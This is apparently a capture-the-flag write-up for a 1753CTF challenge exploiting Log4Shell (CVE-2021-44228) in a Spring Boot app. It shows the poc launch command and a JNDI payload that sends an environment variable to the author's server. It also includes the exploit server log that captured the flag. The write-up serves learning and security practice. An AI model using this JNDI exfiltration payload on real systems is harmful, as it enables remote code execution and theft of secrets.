Home

1753CTF

Text Polyfill

The challenge was a log4j vulnerable Java Spring Boot application.

The pom.xml file in the java maven project says:

       <dependency>
           <groupId>org.apache.logging.log4j</groupId>
           <artifactId>log4j-core</artifactId>
           <version>2.14.1</version>
       </dependency>

That's the vulnerable version of log4j everyone was going crazy about. There's this poc exploit for log4j https://github.com/kozmer/log4j-shell-poc.

I ran this command on my VPS. I replaced its IP with 123.123.123.123.

~/ctf/log4j/log4j-shell-poc$ python3 poc.py --userip 123.123.123.123 --webport 8005 --lport 9001

The flag was an env variable. I submitted ${jndi:ldap://123.123.123.123:1389/${env:flag}} as the text with an image that I corrupted by just typing in random letters in burpsuite in the middle of the image bytes until I got the right kind of error in the java code for it to log that submitted text and execute the jndi ldap request. Yes, I fuzzed the PNG by hand, but it worked!

And the flag showed up in the terminal of the VPS

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://123.123.123.123:1389/a}
[+] Starting Webserver on port 8005 http://0.0.0.0:8005

Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:39:30] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -

Home